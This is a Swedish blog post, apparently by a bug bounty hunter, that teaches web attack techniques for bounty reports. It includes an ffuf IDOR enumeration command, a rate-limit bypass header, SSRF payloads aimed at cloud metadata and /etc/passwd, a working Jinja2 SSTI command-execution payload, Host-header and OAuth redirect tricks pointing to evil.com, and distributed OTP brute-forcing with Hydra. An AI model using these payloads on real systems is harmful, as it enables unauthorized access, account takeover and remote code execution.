Skip to main content
  1. Blogposts/

🚀 Bug Hunting i Vildmarken: En Guide till Avancerade SĂ€kerhetshĂ„l & Bountyjakt

·587 words·3 mins· loading · loading · ·
Rasmus
Author
Rasmus
Att dela en ide eller tvÄ kan vara bra för hjÀrnan
Table of Contents

🚀 Bug Hunting i Vildmarken: En Guide till Avancerade SĂ€kerhetshĂ„l & Bountyjakt

Idag dyker vi ner i en Ă€kta pentest-guldgruva – en samling buggar som skulle fĂ„ vilken bugbounty-jĂ€gare som helst att darra av iver. TĂ€nk dig sjĂ€lv som en modern Indiana Jones, fast istĂ€llet för reliker jagar du CVSS-poĂ€ng och kritiska sĂ„rbarheter. Dags att grĂ€va!


🔓 1 · IDOR i Filexport-API:t – Din Nyckel till Andras Dokument
#

Snabbfakta 📌 CWE: 639 | 🎯 CVSS: 8.6 | đŸ› ïž Verktyg: FFUF

Vad Ă€r problemet? IDOR (Insecure Direct Object Reference) Ă€r som en universellnyckel till ett hotell – gissar du rĂ€tt dörrnummer (doc_id), kan du sno andras PDF:er.

SÄ hÀr gör du:

  1. FÄnga dokument-ID:n frÄn din egen export-URL:
    /api/export?doc_id=1001  # Kopiera, redigera, testa!
    
  2. Brute-force:a smart: Börja med ID:n nÀra ditt eget (±100) och skala upp:
    ffuf -w 1-1050.txt -u "https://target.com/api/export?doc_id=FUZZ"
    
  3. Hitta PDF:er dĂ€r owner_id ≠ din – grattis, du har kringgĂ„tt RBAC!

Pro-tips: LÀgg till X-Original-IP: 127.0.0.1 för att smyga förbi rate limits.


🌐 2 · Blind SSRF i Webhook-endpointen – En Lögnaktig BudbĂ€rare
#

Snabbfakta 📌 CWE: 918 | 🎯 CVSS: 8.2 | 🎣 Payloads: 169.254.169.254

Vad hĂ€nder? Webhooken Ă€r som en trojansk budbĂ€rare – den kan skicka meddelanden vart som helst, inklusive till interna nĂ€tverk eller AWS-metadata.

Exploateringssteg:

ffuf -w cloud-provider-ips.txt -u "https://target.com/webhook/submit?callback_url=http://FUZZ"
  • BĂ€sta payloads:
    • file:///etc/passwd
    • http://foo%40bar@internal-ip (credential-injection!)
  • BekrĂ€fta med Burp Collaborator – ser du DNS-trĂ€ff? Jackpot!

☠ 3 · Mall-RCE via Jinja2 SSTI – NĂ€r Mallar Blir Dödliga
#

Snabbfakta 📌 CWE: 94 | 🎯 CVSS: 9.8 | 💀 Impact: Full RCE

SĂ„ funkar det: Jinja2-mallmotorn Ă€r som en marionett – kontrollerar du snörena (mallinput), kan du fĂ„ systemet att dansa efter dina villkor.

Testa sandboxen:

{{7*7}}  → 49? DĂ„ Ă€r det kört!

Eskalera till RCE:

{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}

Automatisera med en Nuclei-mall – sĂ€tt pĂ„ popcornen och se shell:en rulla in.


⚡ 4 · Sex Bonus-Buggar pĂ„ 60 Sekunder – Snabbjakt för Stressade Hackare
#

Bug Snabblösning
Clickjacking <iframe transparent över "Radera konto" – saknas X-Frame-Options? Bingo!
Pre-Account Takeover Radera kontot → sessionen lever kvar. GET /api/profile = gratis Ă„tkomst.
OAuth Redirect redirect_uri[]=valid&redirect_uri[]=evil – validerar bara första. Lurigt!
Host-Header Poison Host: evil.com i Ă„terstĂ€llningslĂ€nk ⇒ lĂ€nk till din domĂ€n.

🧰 Rekommenderad Verktygsstack – Din Bounty-Motor
#

Burp Suite 2023.6+  # Param-Miner + Collaborator = SSRF-magi
FFUF 2.0.0          # Fuzz:a parametrar, headers OCH paths samtidigt
Nuclei 3.0+         # Anpassade mallar för SSTI/SSRF
Hydra + AWS-spots   # Distribuerad OTP-brute med 50 instanser

💰 Triage-Prioritering: SĂ„ FĂ„r Du Max Payout
#

  1. Mall-RCE → Critical (💰💰💰)
  2. SSRF → AWS Creds → High (💰💰)
  3. IDOR med Mass-Exfil → Medium-High
  4. OAuth Redirect → Snabb fix, bra bounty

✅ Slutchecklista: SĂ„ GodkĂ€nns Din Rapport
#

  • 📾 SkĂ€rmdumpar + Video-PoC – “Jag ser uid=0(root) i terminalen”
  • đŸ· CVSS + MITRE-ID direkt i rapporten – undvik 10 uppföljningsmejl
  • đŸ§Ș Repeterbara kommandon – curl -H "X-Original-IP: 127..."
  • đŸš« Beskriv WAF-kringgĂ„ng – utvecklarna Ă€lskar tekniska detaljer!

🎯 Avslutning: FrĂ„n Bug till Bounty
#

Bugbounty Ă€r en konst – det handlar om att se system med nya ögon. Varje endpoint Ă€r en potentiell dörr, varje parameter en nyckel. NĂ€sta gĂ„ng du ser en Jinja2-mall eller ett doc_id, tĂ€nk: Vad hĂ€nder om jag pushar grĂ€nserna?

Ditt uppdrag: Öppna Burp, vĂ€lj ett mĂ„l, och prova en teknik frĂ„n guiden. Som man sĂ€ger – den som inte vĂ„gar, fĂ„r ingen RCE. 😉

Lycka till, och kom ihĂ„g: Etisk hacking Ă€r som en bra relation – kommunikation, respekt och massvis med curl-kommandon. đŸ–„ïžđŸ’–

[Skrivet av en bugbounty-jÀgare som en gÄng kraschade en SaaS-plattform med en felaktigt URL-kodad emoji. True story.]

Related

🔓 hackarens synvinkel: sĂ„ avslöjar du dolda sĂ€kerhetsbrister som en proffsjĂ€gare
·604 words·3 mins· loading · loading
đŸ•”ïžâ™‚ïž bug bounty-insikter: avslöjar hemligheterna bakom framgĂ„ngsrika hack 🚀
·594 words·3 mins· loading · loading
🔍 avslöjande av it-sĂ„rbarheter: en digital skattjakt & sĂ„ skyddar du dig
·451 words·3 mins· loading · loading